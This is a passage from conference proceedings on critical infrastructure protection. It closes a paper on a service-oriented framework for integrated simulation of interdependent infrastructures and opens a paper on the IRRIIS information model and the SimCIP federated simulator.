Requirement #1: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized approach to model integration. Critical infrastructure analysis requires the participation of a dynamic set of infrastructure models. Evolving analysis requirements will necessitate the plug-n-play of different representations of the same infrastructure as well as different collections of infrastructure models. Requirement #1 highlights the importance of a uniform approach to model integration to account for changing requirements. Requirement #2: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized method for infrastructure model discovery. Critical infrastructure analysis is shaped not only by evolving requirements, but also by infrastructure model availability. Requirement #2 emphasizes the need for a uniform approach to discover infrastructure models to afford this dynamism. Requirement #3: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized method for infrastructure model configuration. Often critical infrastructure models are not static representations, but are configurable to afford a range of behaviors for comparative analysis, to address issues of precision, and to manage computation and performance tradeoffs. Requirement #3 articulates the need for a generalized approach to configure the parameterized aspects of infrastructure models. Requirement #4: Modeling and simulation solutions for critical infrastructure analysis should provide a method for infrastructure model mapping and mediation. Critical infrastructures are highly interdependent. Events within one infrastructure produce effects within other infrastructures. As such, requirement #4 highlights the importance of a uniform approach to mapping and mediating interactions among models so that a method that accounts for dependencies across infrastructures can be afforded. Requirement #5: Modeling and simulation solutions for critical infrastructure analysis should provide a method for supporting emergent critical infrastructure behaviors. Situating critical infrastructure analysis requires more than the ability to link infrastructure models. Properly situating analysis also requires a method for supporting emergent critical infrastructure behaviors. These behaviors are not present within individual infrastructures; nor do they emerge due to simple cross-infrastructure dependencies. Rather, these behaviors appear from the synergy of interacting infrastructures. Requirement #6: Modeling and simulation solutions for critical infrastructure analysis should provide a method for registering interest in temporal events and model events. Events within one infrastructure often produce effects within other infrastructures. To mediate this interplay, a method for registering interest in model events is required. In addition, infrastructure behavior may vary with time - e.g., energy demands at 3:00pm on a hot summer day are different than at 2:00am on a cool spring night. As such, a method to make infrastructure models temporally aware is required. Requirement #7: Modeling and simulation solutions for critical infrastructure analysis should provide a method for accommodating differing simulation
28
W.J. Tolone et al.
methodologies. Different infrastructure models may leverage different simulation methodologies. For example, some models leverage a discrete simulation methodology while other models leverage a continuous simulation methodology. Requirement #7 highlights the necessity for an approach to mediate the differences among simulation methodologies.
4
A Service-Oriented Framework for Integrated Modeling and Simulation
Given the diversity and complexity of individual infrastructure models, we contend a key to enabling integrated modeling and simulation of critical infrastructures is simplicity in the design of an integration framework. Service-oriented architectures (SOAs) embody this simplicity and provide a promising approach to integrated modeling and simulation. SOAs are an emerging approach for enterprise application design and business function integration [10,12]. Structurally, such architectures are characterized by three component roles: service providers, service requesters, and service registries. Service providers implement some business functionality and expose this functionality through a public interface. Service requesters leverage needed business functionality through these public interfaces. Service registries broker the discovery of business functionality by service requesters. Functionally, SOAs are characterized by two distinct mechanisms: mechanisms that facilitate business function registration/discovery; and mechanisms that exercise business functions through requester/provider interaction (see Fig. 1). SOAs are also known for their configurability, extensibility, and scalability. SOAs enable with greater ease the dynamic aggregation of different functionality (i.e., configurability); they facilitate with greater ease the introduction of new functionality (i.e., extensibility); and, they accommodate with greater ease various numbers of providers, requesters, and registries (i.e., scalability). Given these characteristics, the simplicity of the SOA design, and the aforementioned modeling and simulation requirements, SOAs serve as the design foundation for our integrated modeling and simulation framework to enable system of systems analysis of critical infrastructures. Our framework is highlighted by four important design elements: 1) the instantiation of the SOA component roles; 2) a common service provider interface (SPI); 3) the service registration and
Fig. 1. Service-Oriented Architecture
Enabling System of Systems Analysis
29
discover method; and 4) the simulation execution protocol. Collectively, these design elements address to varying degrees the identified modeling and simulation requirements. 4.1
SOA Component Roles
As previously described, SOAs are comprised of three component roles: service providers, service requesters, and service registries. Within our integrated modeling and simulation framework, individual infrastructure models function as our service providers. Our Integrated Modeling Environment (IME) functions in the role of service requester. The service registry is enabled by a configuration file and the underlying file system (see Fig. 2).
Fig. 2. Integrated Modeling and Simulation Framework
Service providers participate in multi-infrastructure simulations by implementing a Connector that realizes the common SPI. This allows the service requesters, to interact with all infrastructure models using a common interface. Given, however, that infrastructure models are often configurable, e.g., PowerWorld Simulator [13] allows end users to select different solvers, each Connector may define the set of configurable properties. Configurable properties must be assigned a valid value before a Connector, and the infrastructure model it represents, can participate in multi-infrastructure simulations. Together, the common SPI and Connector properties provide a generalized approach for infrastructure model interaction, while enabling infrastructure model configuration, i.e., Requirements #1 and #3. 4.2
Service Registration and Discovery Method
To participate in integrated simulations, infrastructure models must register with our framework. First, service providers add entries for their infrastructure
30
W.J. Tolone et al.
models to a configuration file and place relevant software assemblies in specified file directories. The configuration file and supporting file directories provide the IME a means to discover infrastructure models automatically, i.e., Requirement #2. Next, service providers expose their infrastructure model data to the IME. This is occurs for several reasons: development of a common intermediate representation is needed in order to support the specification of cross-infrastructure dependencies, i.e., Requirement #4; awareness of these data facilitate support for emergent infrastructure behaviors, i.e., Requirement #5; and exposing relevant infrastructure data enables the IME to generate a unified visualization for the region of interest. Infrastructure model registration and discovery concludes with the IME possessing a set of Connectors where each Connector encapsulates access to an infrastructure model. 4.3
Common Service Provider Interface
Interaction with infrastructure models presents a special challenges to integrated simulations. First, to address the need for a generalized approach to model integration, i.e., Requirement #1, our framework defines a common SPI for all infrastructure models. The simplicity of our common SPI is one aspect of our framework that distinguishes it from the HLA by reducing the complexity of Connector/federate design. The common SPI also allows infrastructure models to register interest in selected temporal events and model events, i.e., Requirement #6. In the following, we introduce the common SPI. Connect(); When a user wishes to conduct system of systems analysis of critical infrastructures by means of multi-infrastructure simulations, the IME (i.e., service requester) “connects” to all enabled Connectors. The connection process accomplishes two things. First, it initializes each infrastructure model with a timestamp indicating the simulation start time. Second, it allows each infrastructure model in response to register interest in relevant temporal events and model events, i.e., Requirement #6. Disconnect(); When a simulation is complete, the IME “disconnects” from the participating infrastructure models. GetState(); Before a simulation begins, the IME requests from each infrastructure model the operational state of infrastructure components. This interaction between the IME and the infrastructure models synchronizes the state of IME data with each infrastructure model. In response to a GetState() request, an infrastructure model will report to the IME the requested state attributes for the requested infrastructure features. SetState(); When infrastructure models or the IME model of infrastructure dependencies indicate that the state of an infrastructure feature should change (i.e., disabled to enabled; or, enabled to disabled), the SetState() operation is invoked on the relevant infrastructure model. In response, an infrastructure model will report the plausible effects of the state change as a set of subsequent change events. These events are scheduled in the IME simulation timeline for processing.
Enabling System of Systems Analysis
31
ClockAdvanceRequest(); This functionality is required due to the behavior of some infrastructure models. Some infrastructure models require, as much as possible, that all change events for a given timestamp be processed in batch. Thus, when the IME has processed all events associated with the current time on the simulation clock, each infrastructure model is notified and a request is made for approval to advance the time clock. In response, an infrastructure model returns the plausible effects of queued events as a set of subsequent change events. These events are scheduled in the IME simulation timeline for future processing. AdvanceClock(); When the simulation time clock reaches a relevant temporal event, interested infrastructure models are notified of this event using the AdvanceClock() operation.
4.4
Simulation Execution Protocol
The simulation execution protocol supported by the integrated modeling and simulation framework enables event-driven, i.e., discrete, simulations. The IME as service requester, maintains a simulation clock and an ordered simulation timeline of events. The IME also realizes the following simulation execution protocol. At the beginning of a simulation, the IME connects, via the Connect() operation, to each enabled Connector, i.e., infrastructure model. Each Connector responds with infrastructure and temporal events of interest. Next, the IME synchronizes its state with each infrastructure model using the GetState() operation. Every simulation is associated with a course of action (COA). A COA identifies the infrastructure events that are “scheduled” to occur during the simulation. These events are inserted into the simulation timeline. Thus, in the timeline there may be three types of events: scheduled infrastructure events (called actions), emergent infrastructure events (resulting from event processing), and temporal events. Simulation execution begins by processing the “current” events. Processing either a scheduled or emergent event, involves two parts. First, state change is affected in the relevant infrastructure model using the SetState() operation. This operation will return a list of emergent events which are properly inserted into the simulation timeline by the IME. If state change is not affected because the relevant infrastructure model already possesses the desired state, the event is retained but processing of the event terminates. Second, if the event results in a state change, then the infrastructure event is processed according to the relational model specified in the IME context and behavior ontology [17]. Processing a temporal event requires the IME to use the AdvanceClock() operation to notify interested infrastructure models. Once all “current” events have been processed, the IME interacts with each infrastructure model using the RequestAdvanceClock() operation to request approval for the advancement of the simulation clock. If no new “current” events are generated from these requests, then the simulation clock is advanced to next timestamp when either a scheduled, emergent, or temporal event is to occur.
32
W.J. Tolone et al.
When no unprocessed events remain in the simulation timeline, the IME disconnects from each infrastructure model using the Disconnect() operation; and the simulation terminates. While this framework supports discrete simulations, its design does not necessarily prevent the integration of infrastructure models that support continuous simulations. This is possible because the IME “knows” about infrastructure models only by the common SPI. Thus, the framework encapsulates infrastructure model behavior in a manner that hides the service provider simulation methodology, e.g., discrete or continuous, from service requesters. As such, continuous simulations can be embedded within multi-infrastructure discrete simulations. For example, using our framework we have integrated into multi-infrastructure discrete simulations electric power simulations, supported using PowerWorld Simulator, which uses a continuous simulation approach. Thus, the design of the SPI and the encapsulation of infrastructure models, provide an approach to address Requirement #7. The simulation execution protocol is another aspect that distinguishes our framework from the HLA. While the HLA is designed to allow a full range of distributed interaction among federates including both synchronous and asynchronous interaction, our integration framework centralizes interaction through the IME using a well-defined synchronous interaction protocol. Furthermore, the IME centralizes management of the simulation clock. While these characteristics restrict the range of interaction among Connectors, we believe the simplicity of this design and the common SPI will increase the usability and utility of the integration framework.
5
Illustration
To demonstrate how our framework for integrated modeling and simulation enables system of systems analysis of critical infrastructures, an illustration is provided. This illustration focuses on an urban region, possessing infrastructures for electric power, telecommunication, and rail transportation (see Fig. 3).
Fig. 3. Illustrative Infrastructure Models
Enabling System of Systems Analysis
33
In this illustration, independent models for electric power, telecommunication, and rail transportation have been incorporated into our framework as service providers. In other words, a Connector that realizes the common SPI has been implemented for each infrastructure model. Using the IME ontology for infrastructure context and behavior [17], temporal, spatial and functional relationships within and among the infrastructure models are also specified. Fig. 4 depicts the order of effect for an illustrative multi-infrastructure simulation. The initial state of this simulation has all three participating infrastructures enabled. The course of action for this simulation includes one scheduled event - a fallen power line, i.e., 1st order effect. Loss of this power line leads to a power outage in the specified region, i.e., 2nd order effect. This power outage forces a telecommunications central office to migrate to backup power. After backup power is exhausted, however, the central office is disabled, which, in turn, disables connected wireless towers, i.e., 3rd order effect. The subsequent loss of telecommunications affects rail transportation as indicated since the rail infrastructure depends on the telecommunication infrastructure to operate rail switches, i.e., 4th order effect. The simulation final state is also shown. Once simulations complete, they may be explored, replayed, and saved for further analysis. Using the IME, users can examine the order-of-impact of events as well as the plausible impact to each critical infrastructure. In addition, users can examine the event trace to understand and/or validate the event chain that led to an effect. During analysis, users may refine the infrastructure context and behavior ontology, reconfigure infrastructure models, and add/remove/plug-nplay different infrastructure models to explore “what-if” scenarios.
Fig. 4. Illustrative Multi-infrastructure Simulation
34
W.J. Tolone et al.
For this illustration, three infrastructure models were integrated using our SOA framework for integrated modeling and simulation. Due to obvious data sensitivities, notional data were intermixed with actual data. To date, we have used our framework to integrate numerous infrastructure models including models supported by 3rd party solutions such as PowerWorld Simulator [13] and Network Analyst [1]. We have also developed a toolkit of Connectors to enable rapid prototyping of infrastructure models (no Connector development required), which is useful when model data are relatively sparse. The resulting models, however, are still known to the IME only through the common SPI. Finally, we have coupled continuous infrastructure simulations, e.g., [13], into discrete multi-infrastructures simulations.
6
Conclusion
Our framework for integrated modeling and simulation is actively being used to explore and analyze critical infrastructures for large scale (>100,000 km2 ) geographic regions. In addition, we have developed integrated models for urban regions of various scales (e.g., >500 mi2 , 1000 acres). We have also demonstrated the IME on a corporate IT infrastructure model for a Fortune 100 company integrating models for IT hardware, system software, business applications, business processes, and business units. Verification and validation is further enabled by our adherence to the underlying principle of transparency. Analysis enabled by our framework is transparent to the analyst. Event traces can be explored and questioned by subject matter experts. In fact, this practice is regularly utilized by our user community. At the same time, there are aspects of our framework that require further investigation. First, the robustness of our common SPI and simulation execution protocol must be examined. The SPI and simulation execution protocol have undergone some revisions since their initial design to address emergent requirements of individual infrastructures models. For example, the ClockAdvanceRequest() was introduced after discovering that some infrastructure models require, as much as possible, that all change events for a given timestamp be processed in batch. Second, Connector developers are currently responsible for mapping infrastructure model data into a common intermediate representation. This increases the complexity of Connector development while simplifying the design of the IME. Further study is required to determine and validate the proper balance of this responsibility between the Connector developer and the IME. Third, further research is required to validate the integrated modeling and simulation requirements identified in Section 3. These requirements emerged through both research and practice. Additional research is required to determine the completeness and appropriateness of this set. Finally, formal study of the scalability and complexity of our framework from a cognitive perspective is required. That is, a better understanding is needed of how our framework impacts (positively and/or negatively) the cognitive limitations of the developers of integrated models for system of systems analysis.
Enabling System of Systems Analysis
35
References 1. ArcGIS Network Analyst, http://www.esri.com/software/arcgis/extensions/networkanalyst 2. Casalicchio, E., Galli, E., Tucci, S.: Federated agent-based modeling and simulation approach to study interdependencies in IT critical infrastructures. In: 11th IEEE Symp. on Distributed Simulation & Real-Time App. IEEE Computer Society, Los Alamitos (2007) 3. Chaturvedi, A.: A society of simulation approach to dynamic integration of simulations. In: Proc. Winter Simulation Conference (2006) 4. Craven, P., Oman, P.: Modeling advanced train control system networks. To appear in: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, 2nd edn. (2008) 5. Dudenhoeffer, D.D., Permann, M.R., Manic, M.: CIMS: a framework for infrastructure interdependency modeling and analysis. In: Winter Simulation Conf. (2006) 6. Flentge, F., Beyer, U.: The ISE metamodel for critical infrastructures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, pp. 323–336. Springer, Heidelberg (2007) 7. Gursesli, O., Desrochers, A.A.: Modeling infrastructure interdependencies using petri nets. In: IEEE Int’l Conference on Systems, Man and Cybernetics (2003) 8. Marti, J.R., Hollman, J.A., Ventrua, C., Jatskevich, J.: Design for survival real-time infrastructures coordination. In: Int’l Workshop Complex Network & Infrastructure Protection (2006) 9. National Strategy for Homeland Security, U.S. Dept. of Homeland Security (2002) 10. Papazoglou, M.P., Georgakopoulos, D.: Service-oriented computing. Communications of the ACM 46, 10 (2003) 11. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical infrastructure interdependency modeling: a survey of U.S. and international research. Rep. No. INL/EXT-06-11464, Critical Infrastructure Protection Division, INEEL (2006) 12. Perrey, R., Lycett, M.: Service-oriented architecture. In: Proc. of Symp. on Applications and the Internet Workshops, pp. 116–119 (2003) 13. PowerWorld Simulator, http://www.powerworld.com/products/simulator.asp 14. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying,understanding, and analyzing critical infrastructure interdependencies. In: IEEE Control Sys. Mag. (2001) 15. Rittel, H., Webber, M.: Dilemmas in a general theory of planning. In: Policy Sciences, pp. 155–159. Elsevier Scientific Publishing, Amsterdam (1973) 16. Svendsen, N., Wolthusen, S.: Multigraph dependency models for heterogeneous critical infrastructures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, pp. 337–350. Springer, Heidelberg (2007) 17. Tolone, W.J., Lee, S.W., Xiang, W.N., Blackwell, J., Yeager, C., Schumpert, A., Johnson, E.W.: An integrated methodology for critical infrastructure modeling and simulation. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection II, 2nd edn. Springer, Heidelberg (2008) 18. Tolone, W.J., Wilson, D., Raja, A., Xiang, W.N., Hao, H., Phelps, S., Johnson, E.W.: Critical infrastructure integration modeling and simulation. In: Chen, H., Moore, R., Zeng, D.D., Leavitt, J. (eds.) ISI 2004. LNCS, vol. 3073, pp. 214–225. Springer, Heidelberg (2004)
Information Modelling and Simulation in Large Interdependent Critical Infrastructures in IRRIIS R¨ udiger Klein, Erich Rome, C´esaire Beyel, Ralf Linnemann, Wolf Reinhardt, and Andrij Usov Fraunhofer IAIS, Schloss Birlinghoven, Augustin, Germany {Ruediger.Klein}@iais.fraunhofer.de
Abstract. Critical Infrastructures (CIs) and their protection play a very important role in modern societies. Today’s CIs are managed by sophisticated information systems. These information systems have special views on their respective CIs – but can frequently not manage dependencies with other systems adequately. For dependency analysis and management we need information taking the dependency aspects explicitly into account – in well defined relations to all other relevant kinds of information. This is the aim of the IRRIIS Information Model. It is a semantic model or ontology of CI dependencies. This Information Model allows us to integrate information from different CIs – from real ones as in SCADA systems, or from simulations – in order to manage their interdependencies. This paper gives an overview of the IRRIIS Information Model and the way it is used in the IRRIIS simulator SimCIP for the analysis of interdependent infrastructures. An example will be given to illustrate our approach. Keywords: CI dependability, CI dependencies, information modelling, federated simulation, simulation environment.
1
Introduction
Critical infrastructure systems are getting more and more complex. At the same time their (inter-)dependencies grow. Interactions through direct connectivity, through policies and procedures, or simply as the result of geographical neighbourhood often create complex relationships, dependencies, and interdependencies that cross infrastructure boundaries. In the years to come the number, diversity, and importance of critical infrastructures as well as their dependencies will still increase: advanced traffic management and control systems, mobile information services of any kind, ubiquitous computing, ambient intelligence – just to mention a few key words. Even classical domains like electric power networks will change their shape: more distributed generation facilities, intelligent consumers, smaller but interdependent distribution networks are examples of developments to be expected. The good news is that more or less all R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 36–47, 2009. c Springer-Verlag Berlin Heidelberg 2009
Information Modelling and Simulation in Large Interdependent CIs
37
of these critical infrastructures provide and use many kinds of information during operation. This allows us to use this information also for interdependency analysis and management. The modelling and analysis of dependencies between critical infrastructure elements is a relatively new and very important field of study [2]. Much effort is currently being spent to develop models that accurately simulate the behaviours of critical infrastructure [12, 14, 15]. Today, there exists already comprehensive knowledge about managing large and complex systems. There are sophisticated approaches dealing with optimal operation, management of interoperation, safety and risk management issues, etc. Different modelling and problem solving approaches are considered [2] including agent based modelling, game theory, mathematical models, Petri nets, statistical analysis, etc. One of the main challenges for managing CIs and their dependencies comes from the quite different kinds of behaviour of critical infrastructures. Electrical power networks, traffic systems, water and oil pipelines, logistics, or telecommunication systems have their information and communication systems needed for their control – but at the same time they exist in the physical world, they behave according to the laws of physics, and they interact with their physical environment. The management of many critical infrastructures has to take both dimensions and their mutual interactions into account: the physical and the information and communication aspect. For this purpose we need – information models which are sufficiently expressive for CI dependency modelling and analysis – for the physical as well as the information and control aspects and their relationships; – simulation techniques which allow us to describe the physical behaviour of the different systems, their control, and the resulting dependencies; and – methods and tools supporting communication between CIs in order to manage their dependencies. These are the main goals of the IRRIIS project. The modelling and simulation approach taken in this project to deal with CI dependencies will be outlined in this paper. The paper is organized as follows: In Chapter 2 we motivate and describe our modelling approach to CI dependencies. How to use the IRRIIS models for the simulation of critical infrastructures will be explained in more detail in Chapter 3. In Chapter 4 we summarize our results and give an outlook to future research.
2
The IRRIIS Information Model
Today, the management and control of critical infrastructures depends to a large extend on information and communication technologies (ICT). They provide the “nerve systems” of these large infrastructures. There are highly sophisticated software systems allowing the stakeholders to manage, control, and analyse their
38
R. Klein et al.
systems under more or less every condition. What is frequently missing today is information related to dependencies to other systems: geographic neighbourhood information, physical or information and control dependencies, etc. The information systems used to model the critical infrastructures tend to be very different. There is no common modelling approach. They are quite different for different domains, but even within the same domain different information modelling and processing approaches are used. This is quite natural considering the many different kinds of information and the various approaches and algorithms taken for these purposes. Critical infrastructures are physical systems or based on such systems. Electrical power networks, traffic systems, or telecommunication systems exist in the physical world, they behave according to the laws of physics, and they interact with their physical environment. They process information about their state, and they may also exchange information with other systems in order to manage their dependencies. The dependency analysis of critical infrastructures has to take both dimensions and their mutual interactions into account: the physical and the information and communication aspect. Consequently, a key issue is to establish information models and simulation techniques which take exactly these issues into consideration: the components and systems, their behaviours, events, actions of control, risks, etc. This will help to manage critical infrastructures more effectively and efficiently, and it will improve information interchange between those information systems dealing with control of different critical infrastructures. The main point is to bring all dependency related information together with all other kinds of information necessary to manage and control the various kinds of critical infrastructures. We need an information model which is – as general as necessary in order to represent the commonalities of critical infrastructures for dependency analysis independent from their concrete type, – sufficiently expressive in order to represent the many different kinds of related information, and – which is well defined with clear semantics in order to be manageable by the different kinds of information systems working with them. Following established semantic modelling techniques [4] we build the IRRIIS Information Model as an ontology [11] of Critical Infrastructures. In order to be as general as necessary and at the same time as adaptive as needed for the different kinds of CI the IRRIIS Information Model is built on three levels of generalization: 1. the Generic Information Model (GIM): it is the top level ontology of Critical Infrastructures. It is based on the assumption that there is a common core information model for critical infrastructures and their dependencies. Whatever the CI to be modelled and its dependencies are: for the purpose of CI dependency analysis and management it will be described in terms of this IRRIIS Generic Information Model and its domain specific extensions (see below). This common model provides the basis for communication between
Information Modelling and Simulation in Large Interdependent CIs
39
different CIs. It provides a common semantically well-defined vocabulary as pre-condition for this communication. It captures the basic physical structure of the CI with its components and systems and their connections, their behaviours on an appropriate level of abstraction, the services they provide, and events, actions and associated risks. In this way it is sufficiently expressive to capture all dependency related information. 2. The domain specific information models: they adapt, specialize and extend the Generic Information Model according to the special needs of the various domains (like electrical power networks, traffic systems, or telecommunication nets). They contain the specific types of components and their behaviours as specializations of the more general concepts introduced in the GIM. 3. The instance level models: this third layer describes the concrete critical infrastructures in terms of the respective domain specific information model as instantiations of the concepts and relations defined in this model.
2.1
The IRRIIS Generic Information Model
These three models are, of course, tightly related to each other – to be shown in more detail now. The Static Information Model. The Static Model is the basic ontology describing the main concepts, their relations and attributes (see fig. 2) needed for CI modelling1 . Components and systems describe the structure and topology of a CI. Components and systems can be described by a set of relevant attributes (not shown here). In the domain model more specific sub-classes of systems, components and attributes can be introduced. Part Structures Systems have parts – described by the hasPart relation. Its terminal elements are components. Connections Systems and components are connected to other systems and components. (Because connections form a central element in typical CI models they are described by classes with attributes etc. – not just as relations). There can be different types of connections like physical and control connections in the domain models (see below). Services Systems and components provide services to other systems/components, and systems and components need services in order to work correctly. This is a useful and attractive abstraction providing a lot of flexibility for modelling 1
The UML diagrams are just used as illustrations of the model. UML does not provide the necessary semantic precision.
40
R. Klein et al. Events and Actions: events actions
event
triggers
causes event
action
Behaviour Model: states transitions
Static model:
classes instances relations topology attributes
Fig. 1. An overview of the three layers of the IRRIIS Generic Information Model: the static model, the behaviour model, and the event and action layer
– especially for the action of systems and critical infrastructures. In parts of the model or in the whole model we may use services as the basic level of description – omitting the component layer. Effects Services may have effects. An effect is described as resulting in certain values for attributes of involved components or services (heating, cooling, ...). A connection may be used to mediate some services – that’s a way how actions of systems and components can be described in IRRIIS. Dependencies A connection causes a dependency. Due to the different types of connections there may be different types of dependency. Dependencies may be characterized in more detail by various attributes. Geospatial attributes Components, systems and events (see below) may be described by their geospatial locations. Locations and areas are related to each other through geospatial contained-in, neighbourhood, or distance relations. Systems and services. Every service is provided by a system/component. In the same way a system/component needs services in order to work correctly. The failure of any of these input services results in a failure of the component or systems – with the consequence that the services normally provided by it will also fail. A service oriented modelling is an adequate abstraction in those cases where a system or CI provides this service in different ways to other systems/CIs [3]. The IRRIIS Behaviour Model. The key elements in the IRRIIS behaviour model are states and transitions (Fig. 5).
Information Modelling and Simulation in Large Interdependent CIs
41
Fig. 2. The core of the IRRIIS Static Model: components, systems, services and connections
States Components/systems, services, and connections can have states. An entity is in a certain state either if explicitly given (like ‘broken’ or ‘switched-off’) or if the criteria defining this state are fulfilled by this entity (see below). The states are defined according to the respective entity type, i.e., components of a certain type can have different states then other component types or services. Which states are defined depends on the application – the IRRIIS model does deliberately not provide any restrictions here. All we need is a finite set of states. States and Services The state of a service is determined by the state of the component or system which provides this service. The state of a component or system depends on the state of the services it needs. Transitions States (as discrete entities) are related to each other via transitions. States and transitions together form finite state machines for the entities they apply to. The transitions do not have to be deterministic – i.e., we may have probabilistic state machines. We may also assign temporal aspects to such transitions (duration, delay, etc.). Propagation of state transitions The state of a system/component depends on the states of the services it needs or on the states of other components/systems it depends on. If one of those states is changed this transition will be propagated to the depending systems/components. Temporal aspects state transitions are not necessarily instantaneous. They can occur with a certain delay. An overloaded power transmission line will withstand this
42
R. Klein et al.
Fig. 3. The IRRIIS Behaviour Model with states and transitions
overlaod for a while (depending on the amount of overload). Only then it will break. States and Attributes. The states of a component, system, or service can be related to its physical attributes: in order to be in normal operational state a system for instance has to fulfil some constraints on its attributes. In this way states can be classified according to attribute values using classification constraints. These constraints are part of the domain model and are applied to each instance. States may be changed directly by events or actions – without explicit reference to physical attributes. For instance, a system’s state may change when the state of one of its components changes. Or we simply say that a component is broken without saying why and in which way. The definition of states is a key issue in an IRRIIS model. It may be adequate for an IRRIIS application just to discriminate between two states like “working” and “out of work”. In other cases we may need much more fine-grained states (and transitions between them). For instance, a system may still provide the services it is responsible for but with the restriction that some of its sub-systems do not work at the moment and that the built-in redundancy or emergency systems already took over responsibility for these services (resulting in a higher risk of failure). 2.2
The IRRIIS Events and Actions Model
The IRRIS Generic Information Models contains the concepts needed to describe scenarios, events, actions, etc. – and how these concepts are related to the other main information categories. Events Events trigger state transitions. They are either external or internal events. An external event is something happening outside of the respective system or component changing its state. An internal event is a state transition within one of the parts of a system.
Information Modelling and Simulation in Large Interdependent CIs
43
Actions are like events but performed deliberately by a certain agent in order to achieve a certain state change in a certain system/component. Scenarios A scenario is a sequence of events and actions. They are ordered by time, and the events and actions in a scenario may be related to each other by causal relations. They can also be independent from each other (just happening by accident) – thus allowing us to model a large variety of different types of scenarios and of analyzing in which way they affect the dependent critical infrastructures. Scenarios may contain events coming from outside, and events resulting from the evolution of the system. Actions (see below) are similar to events – with the exception that they are executed deliberately as reaction to a certain state, pursuing a certain goal (a state to be reached) and following a certain strategy or policy. Temporal aspects Events and actions can be described in their temporal aspects: when they occur, if they are instantaneous or if they have a duration, etc.
2.3
The IRRIIS Domain Models and Instance Models
The IRRIIS Generic Information Model as top level CI ontology contains the main concepts and relations for modelling large Critical Infrastructures and their dependencies. It provides the basis for the concrete domain models which contain those concepts and relations needed to model domains like electrical power grids or telecommunication networks. These concrete domain concepts and their relations are specializations of the generic concepts defined in the GIM. For instance, in the electrical power grid domain we may have concepts like power station, transformer, and consumer as special categories under the general concept “component/system”, or we may have special relations like ‘controls’ as specialization of the general connection concept in the GIM. The IRRIIS domain models will then be instantiated in order to model concrete systems like the ACEA electrical power network in Rome or the Telecom Italia communication network in central Italy.
3 3.1
The Simulation of Dependent Critical Infrastructures The IRRIIS Simulation Environment SimCIP
In the previous chapter we outlined the IRRIIS Information Model. Now we will explain in which way these models will be used. There are mainly two ways to deal with CI dependency: the management of real critical infrastructures or the simulation of such CIs and their dependencies. The simulation approach will need a simulation environment which allows us to simulate the behaviour of the systems to the necessary granularity and
44
R. Klein et al.
Power N etwo rk
Telc o Powe r N etw ork
Power Tele com Netw ork
Tele com Ne tw ork
Fig. 4. Parts of the instance level models of the simulated networks and their dependencies
precision. In IRRIIS, the simulation environment SimCIP has been developed for this purpose. It is built on our agent based simulation system LampSys which provides important features for CI simulation like encapsulation, modularity, states and transitions, quite different temporal behaviours, and rule based propagation of state transitions along dependency networks. SimCIP can be connected through a generic simulation interface to other external simulators for federated simulation (see the next chapter). 3.2
Federated Simulation
Obviously, critical infrastructures can be quite different and behave in quite different ways. There is a whole bunch of highly sophisticated techniques used to simulate such diverse systems – depending on the type of the systems, their behaviours, and the purposes of the simulation. Typically these simulations do not consider dependencies between systems. That’s exactly the place where the IRRIIS Information Model and its usage come into play. The IRRIIS approach can be characterized as a federated simulation approach: SimCIP takes the simulations of each critical infrastructure and integrates them – taking in this way the dependencies between them into account. The IRRIIS Information Model provides the information “glue” for the federated simulation. SimCIP allows us to relate the results from simulation of one CI in a standardized way to the simulation results of another depending CI by mapping all native simulation results to the unifying IRRIIS Information Model.
Information Modelling and Simulation in Large Interdependent CIs
45
SimCIP federated simulation
Output Input Output Observer
special pupose simulation
CI1
Input Observer
CI2
Fig. 5. Federated simulation in IRRIIS: the simulation tool SimCIP using the IRRIIS Information Model for information integration and native simulation tools for Critical Infrastructures
Though the critical infrastructures are different they communicate through the exchange of information about state transitions and events with each other. This information is formulated in the IRRIIS Information Model allowing all CIs to get the meaning of this information from other CIs. The simulation of the system behaviour of the involved critical infrastructures is combined (or federated) to an overall simulation of dependent critical infrastructures by using the native simulations of each CI and the state transition and event chain mechanism of the IRRIIS simulation. Two points should be highlighted here: – The expressive information model of IRRIIS allows us to represent all relevant information (systems, components, their part structure and dependencies, their behaviours, etc.) in an expressive, adequate and transparent way. – The classification of behaviour results from each CI simulation in terms of states, state transitions, and events is the main “interface” between native CI simulations and IRRIIS’ dependency simulation. In our example federated simulation by SimCIP works as follows: 1. An event in the power network changes the state of the component “power supply” from ‘on’ to ‘broken’. 2. This state transition is propagated by SimCIP to the native power network simulator.
46
R. Klein et al.
3. This simulator calculates the new power distribution of the power network. 4. The results are taken by SimCIP and used for state classification on the power network. 5. Every state change of a component/subsystem in the power network which has a dependency relation to a component in one of the other networks is propagated by SimCIP to this depending component. 6. The state transition of this component is now propagated by SimCIP to the native simulator of this network. This propagation can stop after a while in a new stable state (for instance, if sufficient redundancy of a network prevents it from an outage), it can result in a cascade and outage, or appropriate measures may be taken stopping this propagation. The main point here is that SimCIP integrates the native simulations of the respective critical infrastructures through the common IRRIIS Information Model.
4
Summary and Outlook
The IRRIIS Information Model introduced here provides the basis for information modelling and simulation for CI dependency analysis and management. It is formulated as an ontology providing an expressive framework with clear semantics for the different kinds of information required. As a lingua franca of dependencies it provides the communication platform for exchanging dependency related information between different critical infrastructures even from different sectors and domains. The model introduced here is a first approach which will be further elaborated. Especially, we plan to gather more experiences regarding the expressiveness of the IRRIIS Information Model and the granularity of the domain models (which states, which dependencies, how to model risks, etc.) required. At the moment, event and action chains are specified manually by domain experts. A logical next step is to generate such event action chains automatically in a systematic way. This allows us to analyse dependencies more comprehensively and systematically.
Acknowledgement The research described in this paper was partly funded by the EU commission within the 6th IST Framework in the IRRIIS Integrated Project under contract No 027568. The authors thank all project partners for many interesting discussions which greatly helped to formulate the approach described here.
References 1. The IRRIIS European Integrated Project, http://www.irriis.org 2. Pederson, P., et al.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research, Technical Report, Idaho National Lab (August 2006)
Information Modelling and Simulation in Large Interdependent CIs
47
